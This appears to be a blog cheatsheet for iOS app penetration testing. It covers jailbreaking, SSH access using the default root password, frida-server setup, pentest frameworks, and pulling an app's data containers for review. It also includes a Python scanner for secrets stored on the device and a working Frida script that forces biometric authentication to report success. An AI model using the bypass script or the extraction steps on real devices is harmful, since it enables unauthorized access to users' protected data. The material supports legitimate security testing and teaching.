iOS Penetration Testing Cheatsheet: Tips and Techniques

iOS devices are becoming increasingly popular, but they’re not immune to security vulnerabilities. That’s why it’s important to know how to perform an effective iOS Penetration Test. In this blog post, I will provide you with a cheatsheet of iOS Penetration Testing tips and techniques.


iOS Jailbreaking:

Jailbreaking is the act of removing software restrictions imposed by Apple on its operating systems, including iOS, iPadOS, tvOS, watchOS, and bridgeOS. This allows users to gain greater control over their devices by modifying the operating system to remove limitations and enable customizations. By jailbreaking an Apple device, users can install apps and tweaks from sources other than the official App Store, giving them access to features and software that are otherwise unavailable or restricted by Apple.

In essence, jailbreaking is a way for users to bypass the limitations that Apple places on its devices and gain more freedom and control over their user experience. While this can offer benefits such as access to a wider range of apps and customization options, it’s important to consider the potential risks and drawbacks, such as security vulnerabilities and voided warranties.

1. Checkra1n (quick and easy method for iOS 13+)
# Visit "https://checkra.in/releases/#all-downloads" and download the build that matches your Linux system.
chmod +x filename_checkra1n
# Connect the iOS device to the Linux system via USB.
./filename_checkra1n
# Select Start and follow the on-screen instructions.
# Done!
2. Unc0ver
# Visit "https://unc0ver.dev/" and navigate to the Installation Guide section. Download the .ipa file.
# Install AltServer and iCloud on your computer.
# From the taskbar, click the AltServer icon and install AltStore on the iOS device.
# Navigate to "https://www.diawi.com/", upload the .ipa file and install the application.
# Open unc0ver and jailbreak!

Access iOS via SSH:

# Install an SSH server (OpenSSH) on the jailbroken iOS device
ssh root@192.168.0.109
# SSH default password: alpine (change it; anyone on the network can otherwise log in as root)
# Get the frida-server build matching your desktop frida version from https://github.com/frida/frida/releases
scp /root/Downloads/frida_server_ios root@192.168.0.109:/frida_server_ios
# On the device (step assumed, not shown in the original post): make it executable and start it listening on the port used below
# chmod +x /frida_server_ios && /frida_server_ios -l 0.0.0.0:6969 &
frida-ps -ai -H 192.168.0.109:6969

Automated tools for Static and Dynamic testing:

When it comes to testing the security of iOS applications, it can be helpful to use tools that can speed up the process of both static and dynamic testing. There are many tools available that cover a wide range of security test cases, but two of the most popular are Grapefruit and PassionFruit. Of these two, I would particularly recommend Grapefruit as it supports frida versions 14.0 and higher, while PassionFruit does not work with the latest frida versions. By using tools like these, testers can more efficiently identify potential security vulnerabilities in iOS applications.

1. Grapefruit

Link : https://github.com/ChiChou/Grapefruit

git clone --recurse-submodules https://github.com/ChiChou/Grapefruit
cd Grapefruit
npm install
npm start
2. PassionFruit

Link : https://github.com/chaitin/passionfruit

npm install -g passionfruit
passionfruit
# listening on http://localhost:31337
3. Mobile Security Framework (MobSF)

Mobile Security Framework (MobSF) is a comprehensive, automated tool that can be used for performing security assessments, malware analysis, and penetration testing of mobile applications on various platforms including Android, iOS, and Windows. It provides both static and dynamic analysis capabilities, making it a versatile tool for identifying security vulnerabilities and potential threats.

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh
./run.sh

Manual Static Analysis:

iOS applications often store sensitive data on the client-side, making it vulnerable to attacks. There are several steps that attackers can take to retrieve this sensitive information:

  1. File system analysis: By analyzing the file system of an iOS device, an attacker can locate files that contain sensitive information, such as login credentials, payment information, and personal data.
  2. Jailbreaking: Jailbreaking an iOS device can provide an attacker with root access to the device, allowing them to access sensitive data that would otherwise be protected.
  3. Runtime analysis: By monitoring an application during runtime, an attacker can intercept sensitive information being passed between the application and the server, such as authentication tokens or user credentials.

It is important for developers to be aware of these potential attack vectors and take steps to secure sensitive data on the client-side, such as using encryption and secure storage practices.

The Bundle directory:
Open FileZilla (SFTP session to the iOS device) and visit the path /var/containers/Bundle/Application/
Identify the UUID directory whose contents carry the app's real name, e.g. myAppName B0A7E81E-6434-4FBD-9089-5C8D1CBF7717….

# from SSH of iOS
cd /var/containers/Bundle/Application/B0A7E81E-6434-4FBD-9089-5C8D1CBF7717
zip -r Bundle.zip .

The Data directory:
Repeat the same process for the app's Data container.
Visit from FileZilla /var/mobile/Containers/Data/Application/

cd /var/mobile/Containers/Data/Application/7953069B-01FB-4D1D-A44B-B5757891FCE3
zip -r Data.zip .

To download the zip files, visit http://192.168.0.115:11111/
Download the zip files and analyse them for sensitive information stored on the client side.
Below you can see the common locations where app data is found.

BundlePath : /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
CachesDirectory : /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches
DocumentDirectory : /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents
LibraryDirectory : /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library

You might also be interested in the sqlite3 files. You can retrieve data with the terminal commands below.

sqlite3 {db_file}.db   # open the sqlite3 database
.tables                # list the tables it contains
select * from {table_name};
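The steps above end with a downloaded Data.zip and a manual hunt for sensitive values. As an added example (not from the original post), the Python script below automates that first pass over an extracted Data container: it walks the Documents, Library/Caches and Library/Preferences locations listed above, opens every SQLite database read-only and every plist, and flags column and key names that suggest a secret is kept in plain client-side storage. The sample container it builds is constructed for demonstration.

```python
# Added example, not from the original post: scan an extracted iOS Data container
# for sensitive-looking columns and keys in the locations the post lists.
# The sample container in build_sample_container() is constructed for demonstration.
import os, plistlib, re, sqlite3, tempfile

# Column/key names that suggest a secret sits in plain client-side storage.
SENSITIVE = re.compile(r"pass(word|wd)?|token|secret|\bpin\b|card|ssn|auth", re.I)

def scan_sqlite(path):
    findings = []
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)  # read-only: never alter evidence
    try:
        for (table,) in list(con.execute("SELECT name FROM sqlite_master WHERE type='table'")):
            for col in con.execute(f'PRAGMA table_info("{table}")'):  # col[1] is the column name
                if SENSITIVE.search(col[1]):
                    findings.append((os.path.basename(path), f"{table}.{col[1]}"))
    finally:
        con.close()
    return findings

def scan_plist(path):
    with open(path, "rb") as fh:
        data = plistlib.load(fh)  # handles both XML and binary plists
    keys = data.keys() if isinstance(data, dict) else []
    return [(os.path.basename(path), k) for k in keys if SENSITIVE.search(str(k))]

def scan_container(root):
    findings = []
    for sub in ("Documents", "Library/Caches", "Library/Preferences"):
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for name in files:
                path = os.path.join(dirpath, name)
                if name.endswith((".db", ".sqlite", ".sqlite3")):
                    findings += scan_sqlite(path)
                elif name.endswith(".plist"):
                    findings += scan_plist(path)
    return sorted(findings)

def build_sample_container():
    root = tempfile.mkdtemp(prefix="Data-")  # throwaway stand-in for an app's Data container
    for sub in ("Documents", "Library/Caches", "Library/Preferences"):
        os.makedirs(os.path.join(root, sub))
    for rel, ddl in (("Documents/users.db", "CREATE TABLE account(id INTEGER, username TEXT, password TEXT)"),
                     ("Library/Caches/cache.db", "CREATE TABLE cache(key TEXT, session_token TEXT)")):
        with sqlite3.connect(os.path.join(root, rel)) as con:
            con.execute(ddl)
        con.close()
    with open(os.path.join(root, "Library/Preferences/com.example.app.plist"), "wb") as fh:
        plistlib.dump({"theme": "dark", "apiToken": "constructed-sample"}, fh, fmt=plistlib.FMT_BINARY)
    return root
```

Point scan_container() at the directory you unpacked Data.zip into; every hit is a place to check whether the value should have been in the keychain instead.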

Bypass Biometric Authentication on iOS Devices:

Frida can be used to bypass biometric authentication in an app that trusts the boolean result LocalAuthentication hands back: the script below hooks the app's call to -[LAContext evaluatePolicy:localizedReason:reply:] and swaps the reply block so that it always reports success, without touching the biometric sensor at all. The same hook does not work against apps that bind their secret to a keychain item protected by a biometric SecAccessControl flag, because the Secure Enclave releases that item only after a genuine biometric match.

https://gist.githubusercontent.com/r3ggi/40c252b1e96fd6664f38077c7b90dfa2/raw/9a37570b9bab1a5cb4d70d32e60e86494b7ec769/SecuBank-bypass.js

if (ObjC.available) {
    console.log("Injecting...");
    // Hook the app's call to -[LAContext evaluatePolicy:localizedReason:reply:]
    var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"];
    Interceptor.attach(hook.implementation, {
        onEnter: function (args) {
            // args[4] is the reply block: void (^)(BOOL success, NSError *error)
            var block = new ObjC.Block(args[4]);
            const callback = block.implementation;
            block.implementation = function (success, error) {
                console.log("Changing the result value to true");
                // Invoke the app's original reply with success = YES and no error,
                // regardless of what LocalAuthentication actually returned.
                return callback(1, null);
            };
        },
    });
} else {
    console.log("Objective-C Runtime is not available!");
}

For additional information and resources: https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing